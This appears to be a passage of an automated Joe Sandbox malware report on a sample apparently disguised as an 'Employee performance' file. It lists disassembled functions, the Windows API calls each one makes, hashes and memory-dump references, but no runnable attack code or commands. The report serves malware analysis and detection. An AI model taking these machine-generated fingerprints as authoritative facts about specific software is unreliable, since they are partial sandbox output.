Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 62db7f1c7552a53eaeb4e56a77ec4cc1e32e16e34acf467a695ec815c96b4c51
Instruction ID: 3220390c6783093f670d22fbef60852efecbfe5e9880a61d94b404f8aad2f36e
Opcode Fuzzy Hash: 62db7f1c7552a53eaeb4e56a77ec4cc1e32e16e34acf467a695ec815c96b4c51
Instruction Fuzzy Hash: DDF01D72140158BBE63166529D0DEAB3A7CEFCAB11F000158F682D509496A96A0187B5

Function 01027439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 01027452
SendMessageW.USER32(?,00001328,00000000,?), ref: 01027469
GetWindowDC.USER32(?), ref: 01027475
GetPixel.GDI32(00000000,?,?), ref: 01027484
ReleaseDC.USER32(?,00000000), ref: 01027496
GetSysColor.USER32(00000005), ref: 010274B0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: f8433fc801ba9806f3fc7422b6a45fe0f4e63d725bf7e4c4ab8550fe76cc4c62
Instruction ID: d1ea2c752d4f5a9b1daaeae92d9e41f170d3836cb2c0f5a8b9be7c4a552164da
Opcode Fuzzy Hash: f8433fc801ba9806f3fc7422b6a45fe0f4e63d725bf7e4c4ab8550fe76cc4c62
Instruction Fuzzy Hash: A2018B32400215EFEB615FA4DD08BAA7BB5FB08311F504060F995A21A1CF362E41AB50

Function 01031874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0103187F
UnloadUserProfile.USERENV(?,?), ref: 0103188B
CloseHandle.KERNEL32(?), ref: 01031894
CloseHandle.KERNEL32(?), ref: 0103189C
GetProcessHeap.KERNEL32(00000000,?), ref: 010318A5
HeapFree.KERNEL32(00000000), ref: 010318AC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 2e3ae3694011864b14601f1f5bc6973858154083c3605309392da687ffe0bff8
Instruction ID: cf7bafdbbb6c3cc3c6b2cd74de9075459d38d79affe57994d5bd46a60b3307ef
Opcode Fuzzy Hash: 2e3ae3694011864b14601f1f5bc6973858154083c3605309392da687ffe0bff8
Instruction Fuzzy Hash: AEE0ED36004501FBEB116FA2EE0C905BF39FF4A7227108221F2A585078CB375420DB60

Function 0103C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0103C6EE
_wcslen.LIBCMT ref: 0103C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0103C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0103C7CA

Strings

0, xrefs: 0103C6AF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: ca3a6d0deac13ea2c8e1ad689a6a782c7bc8ae3cdae42f90217d9508248d1448
Instruction ID: 8a678475b35cdc1f0422fa41b00895a33975a406a59c9ad98296ecc964fdd0ca
Opcode Fuzzy Hash: ca3a6d0deac13ea2c8e1ad689a6a782c7bc8ae3cdae42f90217d9508248d1448
Instruction Fuzzy Hash: 6051C2716043009BF7969E28CE45A6B7BECBFC9310F04096EFAD5E2191DB74D904D752

Function 0105AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0105AEA3

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

GetProcessId.KERNEL32(00000000), ref: 0105AF38
CloseHandle.KERNEL32(00000000), ref: 0105AF67

Strings

<, xrefs: 0105AE6B
@, xrefs: 0105AE72

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 3ff173b425a362b127d76c2856827657b3189f1e4384392f6d119ffaaf37d137
Instruction ID: 2bc1446f029050c4df87eb08fd289dd321cb5bb1cd8ac783c9d7caf5817d01d4
Opcode Fuzzy Hash: 3ff173b425a362b127d76c2856827657b3189f1e4384392f6d119ffaaf37d137
Instruction Fuzzy Hash: 78718D71A00215DFCB54EF94D884A9EBBF1FF08310F08859AE856AB392D779ED41DB90

Function 0103719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01037206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0103723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0103724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 010372CF

Strings

DllGetClassObject, xrefs: 01037242

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6e8510c71fb41cb4717d28b3f55f5895a90966ecd18f3f45696464649d5a19ae
Instruction ID: 317d9b5ced393f815f3a96b604ae763eaa660ced7e08a2bb0de77714e5705eb7
Opcode Fuzzy Hash: 6e8510c71fb41cb4717d28b3f55f5895a90966ecd18f3f45696464649d5a19ae
Instruction Fuzzy Hash: 9C413DB1A00205EFDB25CF54C884A9A7FADEF89310F1480ADFD459F20AD7B5D944CBA0

Function 01063D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01063E35
IsMenu.USER32(?), ref: 01063E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01063E92
DrawMenuBar.USER32 ref: 01063EA5

Strings

0, xrefs: 01063D89

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: d7b0f1e40ab8c98244488ec62ec5f8f237bd54e9445dbdf8854ccc7e94d1a18d
Instruction ID: bb04cf70da7ccb075e1837914afccd464e36571a01c20e9521a39e94d37bbdad
Opcode Fuzzy Hash: d7b0f1e40ab8c98244488ec62ec5f8f237bd54e9445dbdf8854ccc7e94d1a18d
Instruction Fuzzy Hash: DF416C75A00209AFEB20DF54DC84AEABBF9FF48350F044159F9899B290D735A940CFA0

Function 01031DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 01033CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01033CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01031E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01031E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 01031EA9

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Strings

ListBox, xrefs: 01031E25
ComboBox, xrefs: 01031DF0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 3d566083a623ff3964ae8067c4bd0c4d4e288690c302f343dca4bf068b14ea09
Instruction ID: a8d820d8a5628f6da50707485e1bc3c2354945b75a164cb5f0b54a758d8b32e7
Opcode Fuzzy Hash: 3d566083a623ff3964ae8067c4bd0c4d4e288690c302f343dca4bf068b14ea09
Instruction Fuzzy Hash: 20213871A00108BEEB14ABA5DC45CFFBBBDEF89350B04411AF4A1A72E1DB7A59099730

Function 01062F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01062F8D
LoadLibraryW.KERNEL32(?), ref: 01062F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01062FA9
DestroyWindow.USER32(?), ref: 01062FB1

Strings

SysAnimate32, xrefs: 01062F68

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 09e7cd5f7c87dd4362e4def5292bf059218c8baaff41e5f0dca3b9502857d34e
Instruction ID: bf04ae74d7c22422626a5dfe4bab039b9f06802b98fcf13707bc302407b8cee2
Opcode Fuzzy Hash: 09e7cd5f7c87dd4362e4def5292bf059218c8baaff41e5f0dca3b9502857d34e
Instruction Fuzzy Hash: 0E21CD72204209ABEF218FA8DC80EBB37EDEF49364F104629FAD0D6195D771DC519760

Function 00FF4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FF4D1E,010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002), ref: 00FF4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00FF4D1E,010028E9,?,00FF4CBE,010028E9,010988B8,0000000C,00FF4E15,010028E9,00000002,00000000), ref: 00FF4DC3

Strings

mscoree.dll, xrefs: 00FF4D86
CorExitProcess, xrefs: 00FF4D98

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2c62f88320cfa4c10b01eab3be737b0852af885945167f3701a1160a33231e64
Instruction ID: 7bf1decf2e549fd073ddcfb205bc04de0baba1e36d803bb84dc5b745f9cea217
Opcode Fuzzy Hash: 2c62f88320cfa4c10b01eab3be737b0852af885945167f3701a1160a33231e64
Instruction Fuzzy Hash: F0F0C830E0020CBBEB209F90DD09BAEBFF4EF45711F000158F985A6164CB355D40DB94

Function 00FD4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4EAE
FreeLibrary.KERNEL32(00000000,?,?,00FD4EDD,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00FD4EA8
kernel32.dll, xrefs: 00FD4E94

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 58235318a35e780c2fb5a1a0a2b77acc3fe906fad59e549684a80c4a5544d5b6
Instruction ID: fbd3e5047251314a05c1c33b72b1f11549ed6ee7c7b2f5ff0f680a4cbcf9b672
Opcode Fuzzy Hash: 58235318a35e780c2fb5a1a0a2b77acc3fe906fad59e549684a80c4a5544d5b6
Instruction Fuzzy Hash: 0BE0CD35E02522ABE33117266C28B5F7759AF82F72B0D0116FCC0DA304DF74DC0155A0

Function 00FD4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4E74
FreeLibrary.KERNEL32(00000000,?,?,01013CDE,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00FD4E6E
kernel32.dll, xrefs: 00FD4E5B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 44b545beee00601f552fbe9b637f90a762820b47af23a8b774eb5d18455e1040
Instruction ID: 5448a2a5a9c3e822e3d3c8c11a49ccad93ceeb870f0af9682ae0c3d7ce521bc9
Opcode Fuzzy Hash: 44b545beee00601f552fbe9b637f90a762820b47af23a8b774eb5d18455e1040
Instruction Fuzzy Hash: FED0C231902661A76A321B25A828E8B2B19AFC6B613090216F8C0AA218CF35CD01A6D0

Function 0105A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0105A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0105A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0105A468
CloseHandle.KERNEL32(?), ref: 0105A63D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 538f66a4db0701fa79b028644c33bb30ede134eb9545b0c5ec0e126890b30e6f
Instruction ID: b07e5a67c9646086e45879c47f812576e28d86f81faf07df9fd0ab9af71ef79d
Opcode Fuzzy Hash: 538f66a4db0701fa79b028644c33bb30ede134eb9545b0c5ec0e126890b30e6f
Instruction Fuzzy Hash: 89A191716043019FE760DF18C882F2AB7E5AF88714F04895DF99A9B392DBB4E841CB91

Function 0100BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01073700), ref: 0100BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,010A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0100BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,010A1270,000000FF,?,0000003F,00000000,?), ref: 0100BC36
_free.LIBCMT ref: 0100BB7F

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 0100BD4B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 662f123d201d1d21fabad054dbddcba201368fb376eca350a95f5be1937ea3cd
Instruction ID: 8336422d0ddb8159a0171bd3b0574cd37f6b9a4303033de0892067537f7e5af9
Opcode Fuzzy Hash: 662f123d201d1d21fabad054dbddcba201368fb376eca350a95f5be1937ea3cd
Instruction Fuzzy Hash: 7A510875900609AFFB22EF69DC809AEBBF8FF41350F5042AAE5D4D71D4EB349A408B50

Function 0103E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0103CF22,?), ref: 0103DDFD

Part of subcall function 0103DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0103CF22,?), ref: 0103DE16

Part of subcall function 0103E199: GetFileAttributesW.KERNEL32(?,0103CF95), ref: 0103E19A

lstrcmpiW.KERNEL32(?,?), ref: 0103E473
MoveFileW.KERNEL32(?,?), ref: 0103E4AC
_wcslen.LIBCMT ref: 0103E5EB
_wcslen.LIBCMT ref: 0103E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0103E650

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 0b7a21c2aebde0ff61d378a242a7155150480cef422cda8e238128ab60b72367
Instruction ID: 734798e4fdda73d3fbddd8580ad3013dfeb4549eaf63b14e87716a0fae79396f
Opcode Fuzzy Hash: 0b7a21c2aebde0ff61d378a242a7155150480cef422cda8e238128ab60b72367
Instruction Fuzzy Hash: 2B5161B25083459BD764EBA4DC809DF77ECAFC5340F004A1EE6C9D3191EF79A2888766

Function 0105B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 0105C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0105B6AE,?,?), ref: 0105C9B5
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105C9F1
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA68
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0105BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0105BB63
RegCloseKey.ADVAPI32(?,?), ref: 0105BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0105BBB3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 0c251a19b6f073db8e7c489c957c299102897fcc264902ce7da57528b443854b
Instruction ID: 2c7789d2877febb2b37a10ec357acbf85d3468c7b4ff3b889342a623c3845c04
Opcode Fuzzy Hash: 0c251a19b6f073db8e7c489c957c299102897fcc264902ce7da57528b443854b
Instruction Fuzzy Hash: 9961C331208201AFE354DF14C890E2BBBE6FF84308F58859DF5954B2A2DB75ED45CB92

Function 01038BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01038BCD
VariantClear.OLEAUT32 ref: 01038C3E
VariantClear.OLEAUT32 ref: 01038C9D
VariantClear.OLEAUT32(?), ref: 01038D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01038D3B

Memory Dump Source

